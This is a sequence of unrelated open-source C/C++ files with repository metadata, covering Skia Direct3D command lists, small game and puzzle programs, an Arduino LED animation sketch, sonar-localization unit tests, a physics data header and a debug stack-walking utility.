"fdeep/layers/softplus_layer.hpp" #include "fdeep/layers/sigmoid_layer.hpp" #include "fdeep/layers/tanh_layer.hpp" #include "fdeep/layers/upsampling_2d_layer.hpp" #include "fdeep/layers/zero_padding_2d_layer.hpp" #include "fdeep/import_model.hpp" #include "fdeep/model.hpp"
59743a68d2111325c97c4d5896417282cbe0f497
3b1c7561c8d3b9452fc0cdefe299b208e0db1853
/src/gpu/ganesh/d3d/GrD3DCommandList.h
e5ea0b63ac8344a40e3d4885361daf3039c56e8e
[ "BSD-3-Clause" ]
permissive
NearTox/Skia
dee04fc980bd40c1861c424b5643e7873f656b01
4d0cd2b6deca44eb2255651c4f04396963688761
refs/heads/master
2022-12-24T02:01:41.138176
2022-08-27T14:32:37
2022-08-27T14:32:37
153,816,056
0
0
BSD-3-Clause
2022-12-13T23:42:44
2018-10-19T17:05:47
C++
UTF-8
C++
false
false
8,980
h
/* * Copyright 2020 Google LLC * * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #ifndef GrD3DCommandList_DEFINED #define GrD3DCommandList_DEFINED #include "include/gpu/GrTypes.h" #include "include/gpu/d3d/GrD3DTypes.h" #include "src/gpu/ganesh/GrManagedResource.h" #include "src/gpu/ganesh/GrRingBuffer.h" #include "src/gpu/ganesh/d3d/GrD3DRootSignature.h" #include <memory> class GrD3DGpu; class GrD3DBuffer; class GrD3DCommandSignature; class GrD3DConstantRingBuffer; class GrD3DPipeline; class GrD3DRenderTarget; class GrD3DRootSignature; class GrD3DAttachment; class GrD3DTexture; class GrD3DTextureResource; class GrScissorState; class GrD3DCommandList { public: virtual ~GrD3DCommandList() { this->releaseResources(); } enum class SubmitResult { kNoWork, kSuccess, kFailure, }; SubmitResult submit(ID3D12CommandQueue* queue); bool close(); void reset(); //////////////////////////////////////////////////////////////////////////// // GraphicsCommandList commands //////////////////////////////////////////////////////////////////////////// // All barriers should reference subresources of managedResource void resourceBarrier( sk_sp<GrManagedResource> managedResource, int numBarriers, const D3D12_RESOURCE_TRANSITION_BARRIER* barriers); void uavBarrier(sk_sp<GrManagedResource> managedResource, ID3D12Resource* uavResource); void aliasingBarrier( sk_sp<GrManagedResource> beforeManagedResource, ID3D12Resource* beforeResource, sk_sp<GrManagedResource> afterManagedResource, ID3D12Resource* afterResource); // Helper method that calls copyTextureRegion multiple times, once for each subresource // The srcBuffer comes from a staging buffer so we don't need to take any refs to it. Instead, // we ref the whole buffer during sumbit. void copyBufferToTexture( ID3D12Resource* srcBuffer, const GrD3DTextureResource* dstTexture, uint32_t subresourceCount, D3D12_PLACED_SUBRESOURCE_FOOTPRINT* bufferFootprints, int left, int top); void copyTextureRegionToTexture( sk_sp<GrManagedResource> dst, const D3D12_TEXTURE_COPY_LOCATION* dstLocation, UINT dstX, UINT dstY, sk_sp<GrManagedResource> src, const D3D12_TEXTURE_COPY_LOCATION* srcLocation, const D3D12_BOX* srcBox); void copyTextureRegionToBuffer( sk_sp<const GrBuffer> dst, const D3D12_TEXTURE_COPY_LOCATION* dstLocation, UINT dstX, UINT dstY, sk_sp<GrManagedResource> src, const D3D12_TEXTURE_COPY_LOCATION* srcLocation, const D3D12_BOX* srcBox); void copyTextureToTexture( const GrD3DTexture* dst, const GrD3DTexture* src, UINT subresourceIndex = -1); // We don't take a ref to the src buffer because we assume the src buffer is coming from a // staging buffer which will get ref'd during submit. void copyBufferToBuffer( sk_sp<GrD3DBuffer> dstBuffer, uint64_t dstOffset, ID3D12Resource* srcBuffer, uint64_t srcOffset, uint64_t numBytes); void addGrBuffer(sk_sp<const GrBuffer> buffer) { fTrackedGpuBuffers.push_back(std::move(buffer)); } // Add ref-counted resource that will be tracked and released when this command buffer finishes // execution. When it is released, it will signal that the resource can be recycled for reuse. void addRecycledResource(sk_sp<GrRecycledResource> resource) { fTrackedRecycledResources.push_back(std::move(resource)); } void releaseResources(); bool hasWork() const { return fHasWork; } void addFinishedCallback(sk_sp<skgpu::RefCntedCallback> callback); private: static const int kInitialTrackedResourcesCount = 32; protected: GrD3DCommandList( gr_cp<ID3D12CommandAllocator> allocator, gr_cp<ID3D12GraphicsCommandList> commandList); // Add ref-counted resource that will be tracked and released when this command buffer finishes // execution void addResource(sk_sp<GrManagedResource> resource) { SkASSERT(resource); fTrackedResources.push_back(std::move(resource)); } void addingWork(); virtual void onReset() {} void submitResourceBarriers(); gr_cp<ID3D12GraphicsCommandList> fCommandList; SkSTArray<kInitialTrackedResourcesCount, sk_sp<GrManagedResource>> fTrackedResources; SkSTArray<kInitialTrackedResourcesCount, sk_sp<GrRecycledResource>> fTrackedRecycledResources; SkSTArray<kInitialTrackedResourcesCount, sk_sp<const GrBuffer>> fTrackedGpuBuffers; // When we create a command list it starts in an active recording state SkDEBUGCODE(bool fIsActive = true;) bool fHasWork = false; private: void callFinishedCallbacks() { fFinishedCallbacks.reset(); } gr_cp<ID3D12CommandAllocator> fAllocator; SkSTArray<4, D3D12_RESOURCE_BARRIER> fResourceBarriers; SkTArray<sk_sp<skgpu::RefCntedCallback>> fFinishedCallbacks; }; class GrD3DDirectCommandList : public GrD3DCommandList { public: static std::unique_ptr<GrD3DDirectCommandList> Make(GrD3DGpu* gpu); ~GrD3DDirectCommandList() override = default; void setPipelineState(const sk_sp<GrD3DPipeline>& pipeline); void setStencilRef(unsigned int stencilRef); void setBlendFactor(const float blendFactor[4]); void setPrimitiveTopology(D3D12_PRIMITIVE_TOPOLOGY primitiveTopology); void setScissorRects(unsigned int numRects, const D3D12_RECT* rects); void setViewports(unsigned int numViewports, const D3D12_VIEWPORT* viewports); void setGraphicsRootSignature(const sk_sp<GrD3DRootSignature>& rootSignature); void setComputeRootSignature(const sk_sp<GrD3DRootSignature>& rootSignature); void setVertexBuffers( unsigned int startSlot, sk_sp<const GrBuffer> vertexBuffer, size_t vertexStride, sk_sp<const GrBuffer> instanceBuffer, size_t instanceStride); void setIndexBuffer(sk_sp<const GrBuffer> indexBuffer); void drawInstanced( unsigned int vertexCount, unsigned int instanceCount, unsigned int startVertex, unsigned int startInstance); void drawIndexedInstanced( unsigned int indexCount, unsigned int instanceCount, unsigned int startIndex, unsigned int baseVertex, unsigned int startInstance); void executeIndirect( const sk_sp<GrD3DCommandSignature> commandSig, unsigned int maxCommandCnt, const GrD3DBuffer* argumentBuffer, size_t argumentBufferOffset); void dispatch( unsigned int threadGroupCountX, unsigned int threadGroupCountY, unsigned int threadGroupCountZ = 1); void clearRenderTargetView( const GrD3DRenderTarget* renderTarget, std::array<float, 4> color, const D3D12_RECT* rect); void clearDepthStencilView( const GrD3DAttachment*, uint8_t stencilClearValue, const D3D12_RECT* rect); void setRenderTarget(const GrD3DRenderTarget* renderTarget); void resolveSubresourceRegion( const GrD3DTextureResource* dstTexture, unsigned int dstX, unsigned int dstY, const GrD3DTextureResource* srcTexture, D3D12_RECT* srcRect); void setGraphicsRootConstantBufferView( unsigned int rootParameterIndex, D3D12_GPU_VIRTUAL_ADDRESS bufferLocation); void setGraphicsRootDescriptorTable( unsigned int rootParameterIndex, D3D12_GPU_DESCRIPTOR_HANDLE bufferLocation); void setComputeRootConstantBufferView( unsigned int rootParameterIndex, D3D12_GPU_VIRTUAL_ADDRESS bufferLocation); void setComputeRootDescriptorTable( unsigned int rootParameterIndex, D3D12_GPU_DESCRIPTOR_HANDLE bufferLocation); void setDescriptorHeaps( ID3D12DescriptorHeap* srvDescriptorHeap, ID3D12DescriptorHeap* samplerDescriptorHeap); void addSampledTextureRef(GrD3DTexture*); private: GrD3DDirectCommandList( gr_cp<ID3D12CommandAllocator> allocator, gr_cp<ID3D12GraphicsCommandList> commandList, bool resolveSubregionSupported); void onReset() override; const GrD3DPipeline* fCurrentPipeline = nullptr; const GrD3DRootSignature* fCurrentGraphicsRootSignature = nullptr; const GrD3DRootSignature* fCurrentComputeRootSignature = nullptr; const GrBuffer* fCurrentVertexBuffer = nullptr; size_t fCurrentVertexStride = 0; const GrBuffer* fCurrentInstanceBuffer = nullptr; size_t fCurrentInstanceStride = 0; const GrBuffer* fCurrentIndexBuffer = nullptr; D3D12_GPU_VIRTUAL_ADDRESS fCurrentGraphicsConstantBufferAddress = 0; D3D12_GPU_VIRTUAL_ADDRESS fCurrentComputeConstantBufferAddress = 0; D3D12_GPU_DESCRIPTOR_HANDLE fCurrentGraphicsRootDescTable[GrD3DRootSignature::kParamIndexCount]; D3D12_GPU_DESCRIPTOR_HANDLE fCurrentComputeRootDescTable[GrD3DRootSignature::kParamIndexCount]; const ID3D12DescriptorHeap* fCurrentSRVCRVDescriptorHeap = nullptr; const ID3D12DescriptorHeap* fCurrentSamplerDescriptorHeap = nullptr; bool fResolveSubregionSupported; }; class GrD3DCopyCommandList : public GrD3DCommandList { public: static std::unique_ptr<GrD3DCopyCommandList> Make(GrD3DGpu* gpu); private: GrD3DCopyCommandList( gr_cp<ID3D12CommandAllocator> allocator, gr_cp<ID3D12GraphicsCommandList> commandList); }; #endif
70310f6cb95302e531861bf098899d68a80722fa
3f2e62d5a6c8067431ade3c1c4ba4f7703a9b70c
/src/core/TextureRegion.h
29548f2509168283fffbb62fd5faf0ba420340f3
[]
no_license
kaala/tappy-plane
c4ecf857831d91955f11e23e212cd0270f4bc83e
4b90e1b9dd426da764af7b3deef8fdf6a3baf0ea
refs/heads/master
2021-01-18T07:51:38.025249
2014-06-27T15:38:36
2014-06-27T15:38:36
null
0
0
null
null
null
null
UTF-8
C++
false
false
639
h
// // TextureRegion.h // tappyplane // // Created by Stephen Gowen on 2/1/14. // Copyright (c) 2014 Techne Games. All rights reserved. // #ifndef __tappyplane__TextureRegion__ #define __tappyplane__TextureRegion__ #ifdef TECHNE_GAMES_DIRECT_3D #include <windows.h> #endif class TextureRegion { public: TextureRegion(float x, float y, float regionWidth, float regionHeight, float textureWidth, float textureHeight); #ifdef TECHNE_GAMES_OPENGL_ES float u1, v1, u2, v2; #elif TECHNE_GAMES_DIRECT_3D long left, top, right, bottom; RECT getSourceRECT(); #endif }; #endif /* defined(__tappyplane__TextureRegion__) */
b20054f4cfc437c4f6261247bef9060309640dbe
024ed9472645bbf3b1e1d89338d75c23a0f0bc94
/SimulatedAnnealing/main.cpp
39312ead578f8776c51e543b24f2b58020e7c868
[]
no_license
SteadyCoder/Eight-Queens
22c7ba182084b70c68f96dbeca9af17020f1c9bd
0d0dfa09236b074d7f05ff953a28b80b54ad47f7
refs/heads/master
2021-05-30T11:03:01.718248
2016-02-04T20:36:15
2016-02-04T20:36:15
null
0
0
null
null
null
null
UTF-8
C++
false
false
528
cpp
// // main.cpp // you_are_looser // // Created by Ваня Ткаченко on 12/11/15. // Copyright © 2015 Stead. All rights reserved. // #include "methods.hpp" int main() { srand(time(NULL)); //for correct working 'rand'-function int sizeOfBoard; cout << "Enter the size of the chess board : "; cin >> sizeOfBoard; ChessBoard& DemoChessBoard = *(new ChessBoard(sizeOfBoard)); DemoChessBoard.DrawBoard(); DemoChessBoard.Solution(); delete &DemoChessBoard; return 0; }
17fdc6dcbdc0a7ce87bf6ee70aa8475c1959a131
f5d3ca5316bb91a529ff0dade3b017851fdf095c
/Liana.ino
cdefbaf3c5f2ec940d62d048770b6723d794c68c
[]
no_license
eeak/Liana
641b00f3ba5b44cf9f0b923cb235e20be6885bee
1492820ca2e0764b910b01ff48c460b2f3cdc392
refs/heads/master
2022-04-14T01:09:09.712277
2019-12-31T14:54:13
2019-12-31T14:54:13
null
0
0
null
null
null
null
UTF-8
C++
false
false
3,237
ino
#include <WebSocketsServer.h> #include <ESP8266WiFi.h> #include <ESP8266WiFiMulti.h> #include <WiFiClient.h> #include <SPIFFSReadServer.h> #include <ESP8266mDNS.h> #include <DNSServer.h> #include <WiFiUdp.h> #include <ArduinoOTA.h> #include <PersWiFiManager.h> #include <EspHtmlTemplateProcessor.h> #include <FileReader.h> #include <ArduinoJson.h> #include "palette.h" #include "anim.h" #include "config.h" #define ANIMS 8 //number of animations (not including start one) to cycle randomly #define PALS 8 //number of palettes #define INTERVAL 30000 //change interval, msec //#define USE_START_ANIMATION //start animation is used in cycling as well as other animations Palette * pals[PALS] = {&PalRgb, &PalRainbow, &PalRainbowStripe, &PalParty, &PalHeat, &PalFire, &PalIceBlue, &PalXMas}; Anim anim = Anim(); LianaConfig currentConfig; unsigned long ms = 10000;//startup animation duration, 10000 for "release" AnimStart int paletteInd = random(PALS); int animInd = 0; void setup() { Serial.begin(115200); Serial.println("Entering setup"); wifiSetUp(); randomSeed(analogRead(0)*analogRead(1)); anim.setAnim(animInd); anim.setPeriod(20); anim.setPalette(pals[0]); anim.doSetUp(); if (SPIFFS.begin()) { Serial.println("SPIFFS started"); } else { Serial.println("SPIFFS FAILED"); } File file = SPIFFS.open("/index.htm", "r"); if (!file) { Serial.println("/index.htm not found"); } else { Serial.printf("/index.htm size: %d\n", file.size()); } file.close(); Serial.println("Setup done"); } void loop() { yield(); /* this piece of code checks for looping while trying to find different colors for (int pi=0;pi<PALS;pi++) { int c = 0; Serial.print(F("pi="));Serial.print(pi); Color c1 = pals[pi]->getPalColor((float)rngb()/256); Color c2 = c1; while (c1.isCloseTo(c2)) { c = c + 1; c2 = pals[pi]->getPalColor((float)rngb()/256); } Serial.print(F(" c="));Serial.println(c); } /**/ anim.run(); if (millis() > ms && animInd != 255) {// animind == 255 is for turned off strip - it never ends automatically ms = millis() + INTERVAL; switch ( (animInd <= 0) ? 0 : random(2)) { case 0: { Serial.print(F("anim->")); int prevAnimInd = animInd; #ifdef USE_START_ANIMATION while (prevAnimInd == animInd) animInd = random(ANIMS+1); if (animInd == 0) ms = millis() + 10000;//startup animation has fixed 10 seconds length #else while (prevAnimInd == animInd) animInd = random(ANIMS) + 1; #endif setAnimPal(); wsNotify(-1); break; } case 1: { Serial.print(F("pal->")); int prevPalInd = paletteInd; while (prevPalInd == paletteInd) paletteInd = random(PALS); anim.setPalette(pals[paletteInd]); Serial.print(paletteInd); break; } } Serial.println(); } /**/ wifiLoop(); } //sets animation and palette to values specified in animInd and paletteInd, //and notifies all WebSocket connections of the change void setAnimPal() { anim.setAnim(animInd); anim.setPeriod(random(20, 40)); anim.setPalette(pals[paletteInd]); anim.doSetUp(); }
801477e458e3210d27ec77f10016752cc83adbc8
c6f447ae7b5d67cb6e475ec29ecc95c229d3a921
/test/tests.cpp
7e4d7e6f9ce264263434eeb23615cb85d260d3fb
[]
no_license
OpenLEAD/sonar_localization
154c8f9d465ad08f85c85e90f4e6935dfa355f67
a303f4a9c5c1e7a2add99d7fd90b71adf1416504
refs/heads/master
2021-01-19T02:01:34.466107
2016-06-29T20:02:43
2016-06-29T20:02:43
23,441,712
3
0
null
null
null
null
UTF-8
C++
false
false
5,050
cpp
#include <gtest/gtest.h> #include <imaging_sonar_localization/PoseEstimator.cpp> #include <imaging_sonar_localization/Configuration.hpp> #include <imaging_sonar_localization/SonarSimulation.hpp> #include <vizkit3d_normal_depth_map/ImageViewerCaptureTool.hpp> #include <vizkit3d_normal_depth_map/NormalDepthMap.hpp> #include <gpu_sonar_simulation/MultibeamSonar.hpp> #include <vizkit3d_world/Vizkit3dWorld.hpp> #include <gpu_sonar_simulation/MultibeamSonar.hpp> #include <string> #include <iostream> #include <osg/Geode> #include <osg/Group> #include <osg/ShapeDrawable> #include <osg/Transform> #include <osg/MatrixTransform> #include <osgDB/ReadFile> using namespace imaging_sonar_localization; // add an oil rig manifold to the scene void addOilRig(osg::ref_ptr<osg::Group> root){ std::string current_path(__FILE__); current_path = current_path.substr(0, current_path.find_last_of("/")); osg::Node* oilring = osgDB::readNodeFile(current_path + "/oil_rig_manifold/visual.dae.osgb"); osg::Matrix mtransf; mtransf.preMult(osg::Matrix::translate(0, 13, 0)); mtransf.preMult(osg::Matrix::scale(0.1f,0.1f,0.1f)); osg::MatrixTransform *ptransform = new osg::MatrixTransform(); ptransform->setMatrix(mtransf); ptransform->addChild(oilring); root->addChild(ptransform); } class PoseEstimatorTest : public::testing::Test { protected: virtual void SetUp() { osg::ref_ptr<osg::Image> osg_image; // init scene float viewX = 3.0, viewY = 35.0; double range = 60.0; osg::ref_ptr<osg::Group> root = new osg::Group(); addOilRig(root); sonar_sim = new SonarSimulation(range, viewX, viewY, 100, true, root); config = new Configuration(); a=0; } SonarSimulation* sonar_sim; Configuration* config; int a; }; TEST_F(PoseEstimatorTest, DISABLED_InitTest){ PoseEstimator filter(*config); //mean of the initial xy pose dist base::Vector2d mu_pose(1.0,1.0); //variance of the initial xy pose dist base::Vector2d sigma_pose(.1,.1); double mu_yaw = 1.0; double sigma_yaw = 0.1; double mu_wc = 1.0; double sigma_wc = 0.1; filter.init(1000000,sonar_sim, mu_pose, sigma_pose, mu_yaw,sigma_yaw,mu_wc,sigma_wc); Statistics init_stats = filter.getStatistics(); EXPECT_NEAR(1.0,init_stats.m_x,0.001); EXPECT_NEAR(1.0,init_stats.m_y,0.001); EXPECT_NEAR(1.0,init_stats.m_yaw,0.001); EXPECT_NEAR(1.0,init_stats.m_wc,0.001); EXPECT_NEAR(0.01,init_stats.s_x,0.0001); EXPECT_NEAR(0.01,init_stats.s_y,0.0001); EXPECT_NEAR(0.01,init_stats.s_yaw,0.0001); EXPECT_NEAR(0.01,init_stats.s_wc,0.0001); } TEST_F(PoseEstimatorTest,InitTestwithZeroError){ PoseEstimator filter(*config); //mean of the initial xy pose dist base::Vector2d mu_pose(0.0,0.0); //variance of the initial xy pose dist base::Vector2d sigma_pose(0.0,0.0); double mu_yaw = 0.0; double sigma_yaw = 0.0; double mu_wc = 0.0; double sigma_wc = 0.0; filter.init(10,sonar_sim, mu_pose, sigma_pose, mu_yaw,sigma_yaw,mu_wc,sigma_wc); Statistics init_stats = filter.getStatistics(); EXPECT_NEAR(.0,init_stats.m_x,0.00001); EXPECT_NEAR(.0,init_stats.m_y,0.00001); EXPECT_NEAR(.0,init_stats.m_yaw,0.00001); EXPECT_NEAR(.0,init_stats.m_wc,0.00001); EXPECT_NEAR(0.0,init_stats.s_x,0.00000001); EXPECT_NEAR(0.0,init_stats.s_y,0.00000001); EXPECT_NEAR(0.0,init_stats.s_yaw,0.00000001); EXPECT_NEAR(0.0,init_stats.s_wc,0.00000001); } TEST_F(PoseEstimatorTest,ProjectLinearVelTest){ PoseEstimator filter(*config); //mean of the initial xy pose dist base::Vector2d mu_pose(0.0,0.0); //variance of the initial xy pose dist base::Vector2d sigma_pose(0.0,0.0); double mu_yaw = 0.0; double sigma_yaw = 0.0; double mu_wc = 0.0; double sigma_wc = 0.0; filter.init(1000000, sonar_sim, mu_pose, sigma_pose, mu_yaw,sigma_yaw,mu_wc,sigma_wc); Statistics init_stats = filter.getStatistics(); base::TwistWithCovariance input; input.vel = base::Vector3d(1,1,0); input.rot = base::Vector3d(0,0,0); input.cov << 0.1, 0, 0, 0, 0, 0, 0, 0.1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0; filter.project(input,1); EXPECT_NEAR(1.0,init_stats.m_x,0.00001); EXPECT_NEAR(1.0,init_stats.m_y,0.00001); EXPECT_NEAR(.0,init_stats.m_yaw,0.00001); EXPECT_NEAR(.0,init_stats.m_wc,0.00001); EXPECT_NEAR(0.1,init_stats.s_x,0.00000001); EXPECT_NEAR(0.1,init_stats.s_y,0.00000001); EXPECT_NEAR(0.0,init_stats.s_yaw,0.00000001); EXPECT_NEAR(0.0,init_stats.s_wc,0.00000001); } int main(int argc, char **argv) { testing::InitGoogleTest(&argc, argv); return RUN_ALL_TESTS(); }
b500c3d01616b70a9d5c7216c20eb1466a4cebe3
d2190cbb5ea5463410eb84ec8b4c6a660e4b3d0e
/old_hydra/hydra/tags/apr07a/base/datastruct/hlinearcategory.h
052fecb4fe94ded60d3b47e9f0c02b8d4f7b4f86
[]
no_license
wesmail/hydra
6c681572ff6db2c60c9e36ec864a3c0e83e6aa6a
ab934d4c7eff335cc2d25f212034121f050aadf1
refs/heads/master
2021-07-05T17:04:53.402387
2020-08-12T08:54:11
2020-08-12T08:54:11
149,625,232
0
0
null
null
null
null
UTF-8
C++
false
false
1,760
h
#ifndef HLINEARCATEGORY_H #define HLINEARCATEGORY_H #include "hcategory.h" class HLinearCatIter; class HLinearCategory : public HCategory { friend class HLinearCatIter; protected: TClonesArray *fData; // Data array of the category Int_t fNDataObjs; Bool_t hasDynamicObjects; public: HLinearCategory(void); HLinearCategory(Text_t *className,Int_t size=1000); ~HLinearCategory(void); const Text_t *getClassName(void); TClass *getClass(void) {return fData->GetClass();} void makeBranch(TBranch *parent); void activateBranch(TTree *tree,Int_t splitLevel); Int_t getEntries() {return fData->GetEntriesFast();} TObject *&getNewSlot(HLocation &aLoc,Int_t* pIndex=0); TObject *&getSlot(HLocation &aLoc,Int_t* pIndex=0); TObject *&getSlot(Int_t index); TObject *getObject(HLocation &aLoc); TObject *getObject(Int_t index); Bool_t filter(HFilter &aFilter); Bool_t filter(HLocation &aLoc,HFilter &aFilter); void Clear(Option_t *opt=""); void Compress(void) { // compresss the TClonesArray fData->Compress(); fNDataObjs = fData->GetEntries(); } void setDynamicObjects(Bool_t isDyn=kTRUE); void freeDynamicMemory(); inline Bool_t isSelfSplitable(void); TIterator *MakeIterator(Option_t* opt="catIter",Bool_t dir=kIterForward); Int_t getIndex(HLocation &aLoc) {return aLoc[0];} Int_t getIndex(TObject* pObj) {return fData->IndexOf(pObj);} void sort(void) {fData->Sort(fNDataObjs);} const TCollection* getCollection(){return fData;} ClassDef(HLinearCategory,2) // Generic data category (1-dim array of objects) }; //--------------------inlines-------------------------------- inline Bool_t HLinearCategory::isSelfSplitable(void) { return kFALSE; } #endif /* !HLINEARCATEGORY_H */
c914266a38840305d798945f0f4b24eb821a3f00
78ef6727092c8ef5ac7900717c602b8c27b8e03b
/src/Shared/Stackwalker.cpp
1b0236faba20d107584e32080720aa84ac4633bb
[]
no_license
PubFork/uaf
fef542c983e5a1a25bf1593cb2fc4534523c46fb
98fa9da100fdfccdaa4e9725203fbd0aca9b656d
refs/heads/master
2023-08-12T18:45:44.652484
2021-10-04T22:39:32
2021-10-04T22:39:32
null
0
0
null
null
null
null
ISO-8859-10
C++
false
false
19,057
cpp
#include "..\shared\stdafx.h" #include "Stackwalker.h" void *My_malloc(int size); void My_free(void *addr); #ifdef _IMAGEHLP_ #error "'imagehlp.h' should only included here, not before this point! Otherwise there are some problems!" #endif #pragma pack( push, before_imagehlp, 8 ) #pragma warning (disable:4091) #include <imagehlp.h> #pragma pack( pop, before_imagehlp ) // Global data: static BOOL g_bInitialized = FALSE; static HINSTANCE g_hImagehlpDll = NULL; static IMAGEHLP_SYMBOL *g_pSym = NULL; //static DWORD g_dwShowCount = 0; // increase at every ShowStack-Call //static CRITICAL_SECTION g_csFileOpenClose = {0}; #define gle (GetLastError()) #define lenof(a) (sizeof(a) / sizeof((a)[0])) #define MAXNAMELEN 1024 // max name length for found symbols #define IMGSYMLEN ( sizeof IMAGEHLP_SYMBOL ) #define TTBUFLEN 8096 // for a temp buffer (2^13) static CHAR tt[TTBUFLEN+1]; // SymCleanup() typedef BOOL (__stdcall *tSC)( IN HANDLE hProcess ); tSC pSC = NULL; // SymFunctionTableAccess() typedef PVOID (__stdcall *tSFTA)( HANDLE hProcess, DWORD AddrBase ); tSFTA pSFTA = NULL; // SymGetLineFromAddr() typedef BOOL (__stdcall *tSGLFA)( IN HANDLE hProcess, IN DWORD dwAddr, OUT PDWORD pdwDisplacement, OUT PIMAGEHLP_LINE Line ); tSGLFA pSGLFA = NULL; // SymGetModuleBase() typedef DWORD (__stdcall *tSGMB)( IN HANDLE hProcess, IN DWORD dwAddr ); tSGMB pSGMB = NULL; // SymGetModuleInfo() typedef BOOL (__stdcall *tSGMI)( IN HANDLE hProcess, IN DWORD dwAddr, OUT PIMAGEHLP_MODULE ModuleInfo ); tSGMI pSGMI = NULL; // SymGetOptions() typedef DWORD (__stdcall *tSGO)( VOID ); tSGO pSGO = NULL; // SymGetSymFromAddr() typedef BOOL (__stdcall *tSGSFA)( IN HANDLE hProcess, IN DWORD dwAddr, OUT PDWORD pdwDisplacement, OUT PIMAGEHLP_SYMBOL Symbol ); tSGSFA pSGSFA = NULL; // SymInitialize() typedef BOOL (__stdcall *tSI)( IN HANDLE hProcess, IN PSTR UserSearchPath, IN BOOL fInvadeProcess ); tSI pSI = NULL; // SymLoadModule() typedef DWORD (__stdcall *tSLM)( IN HANDLE hProcess, IN HANDLE hFile, IN PSTR ImageName, IN PSTR ModuleName, IN DWORD BaseOfDll, IN DWORD SizeOfDll ); tSLM pSLM = NULL; // SymSetOptions() typedef DWORD (__stdcall *tSSO)( IN DWORD SymOptions ); tSSO pSSO = NULL; // StackWalk() typedef BOOL (__stdcall *tSW)( DWORD MachineType, HANDLE hProcess, HANDLE hThread, LPSTACKFRAME StackFrame, PVOID ContextRecord, PREAD_PROCESS_MEMORY_ROUTINE ReadMemoryRoutine, PFUNCTION_TABLE_ACCESS_ROUTINE FunctionTableAccessRoutine, PGET_MODULE_BASE_ROUTINE GetModuleBaseRoutine, PTRANSLATE_ADDRESS_ROUTINE TranslateAddress ); tSW pSW = NULL; // UnDecorateSymbolName() typedef DWORD (__stdcall WINAPI *tUDSN)( PCSTR DecoratedName, PSTR UnDecoratedName, DWORD UndecoratedLength, DWORD Flags ); tUDSN pUDSN = NULL; struct ModuleEntry { CString imageName; CString moduleName; DWORD baseAddress; DWORD size; }; typedef CArray< ModuleEntry, ModuleEntry& > ModuleList; /////////////////////////////////////////////////////////////////////////////// static int InitStackWalk(void) { if (g_bInitialized != FALSE) return 0; // already initialized // old: we load imagehlp.dll dynamically because the NT4-version does not // old: offer all the functions that are in the NT5 lib // 02-12-19: Now we only support dbghelp.dll! // To use it on NT you have to install the redistributable for DBGHELP.DLL g_hImagehlpDll = LoadLibrary( _T("dbghelp.dll") ); if ( g_hImagehlpDll == NULL ) { TRACE( "LoadLibrary( \"dbghelp.dll\" ): GetLastError = %lu\n", gle ); g_bInitialized = FALSE; return 1; } pSC = (tSC) GetProcAddress( g_hImagehlpDll, "SymCleanup" ); pSFTA = (tSFTA) GetProcAddress( g_hImagehlpDll, "SymFunctionTableAccess" ); pSGLFA = (tSGLFA) GetProcAddress( g_hImagehlpDll, "SymGetLineFromAddr" ); pSGMB = (tSGMB) GetProcAddress( g_hImagehlpDll, "SymGetModuleBase" ); pSGMI = (tSGMI) GetProcAddress( g_hImagehlpDll, "SymGetModuleInfo" ); pSGO = (tSGO) GetProcAddress( g_hImagehlpDll, "SymGetOptions" ); pSGSFA = (tSGSFA) GetProcAddress( g_hImagehlpDll, "SymGetSymFromAddr" ); pSI = (tSI) GetProcAddress( g_hImagehlpDll, "SymInitialize" ); pSSO = (tSSO) GetProcAddress( g_hImagehlpDll, "SymSetOptions" ); pSW = (tSW) GetProcAddress( g_hImagehlpDll, "StackWalk" ); pUDSN = (tUDSN) GetProcAddress( g_hImagehlpDll, "UnDecorateSymbolName" ); pSLM = (tSLM) GetProcAddress( g_hImagehlpDll, "SymLoadModule" ); if ( pSC == NULL || pSFTA == NULL || pSGMB == NULL || pSGMI == NULL || pSGO == NULL || pSGSFA == NULL || pSI == NULL || pSSO == NULL || pSW == NULL || pUDSN == NULL || pSLM == NULL ) { TRACE( "GetProcAddress(): some required function not found.\n" ); FreeLibrary( g_hImagehlpDll ); g_bInitialized = FALSE; return 1; } g_bInitialized = TRUE; return 0; } void CleanupStackWalk() { if ( g_hImagehlpDll != NULL ) FreeLibrary(g_hImagehlpDll); if (g_pSym != NULL) My_free(g_pSym); } // **************************************** ToolHelp32 ************************ #define MAX_MODULE_NAME32 255 #define TH32CS_SNAPMODULE 0x00000008 #pragma pack( push, 8 ) typedef struct tagMODULEENTRY32 { DWORD dwSize; DWORD th32ModuleID; // This module DWORD th32ProcessID; // owning process DWORD GlblcntUsage; // Global usage count on the module DWORD ProccntUsage; // Module usage count in th32ProcessID's context BYTE * modBaseAddr; // Base address of module in th32ProcessID's context DWORD modBaseSize; // Size in bytes of module starting at modBaseAddr HMODULE hModule; // The hModule of this module in th32ProcessID's context char szModule[MAX_MODULE_NAME32 + 1]; char szExePath[MAX_PATH]; } MODULEENTRY32; typedef MODULEENTRY32 * PMODULEENTRY32; typedef MODULEENTRY32 * LPMODULEENTRY32; #pragma pack( pop ) static bool GetModuleListTH32(ModuleList& modules, DWORD pid, FILE *fLogFile) { // CreateToolhelp32Snapshot() typedef HANDLE (__stdcall *tCT32S)(DWORD dwFlags, DWORD th32ProcessID); // Module32First() typedef BOOL (__stdcall *tM32F)(HANDLE hSnapshot, LPMODULEENTRY32 lpme); // Module32Next() typedef BOOL (__stdcall *tM32N)(HANDLE hSnapshot, LPMODULEENTRY32 lpme); // try both dlls... const TCHAR *dllname[] = { _T("kernel32.dll"), _T("tlhelp32.dll") }; HINSTANCE hToolhelp=NULL; tCT32S pCT32S=NULL; tM32F pM32F=NULL; tM32N pM32N=NULL; HANDLE hSnap; MODULEENTRY32 me; me.dwSize = sizeof(me); bool keepGoing; ModuleEntry e; int i; for (i = 0; i<lenof(dllname); i++ ) { hToolhelp = LoadLibrary( dllname[i] ); if (hToolhelp == NULL) continue; pCT32S = (tCT32S) GetProcAddress(hToolhelp, "CreateToolhelp32Snapshot"); pM32F = (tM32F) GetProcAddress(hToolhelp, "Module32First"); pM32N = (tM32N) GetProcAddress(hToolhelp, "Module32Next"); if ( pCT32S != 0 && pM32F != 0 && pM32N != 0 ) break; // found the functions! FreeLibrary(hToolhelp); hToolhelp = NULL; } if (hToolhelp == NULL) return false; hSnap = pCT32S( TH32CS_SNAPMODULE, pid ); if (hSnap == (HANDLE) -1) { if (hToolhelp != NULL) 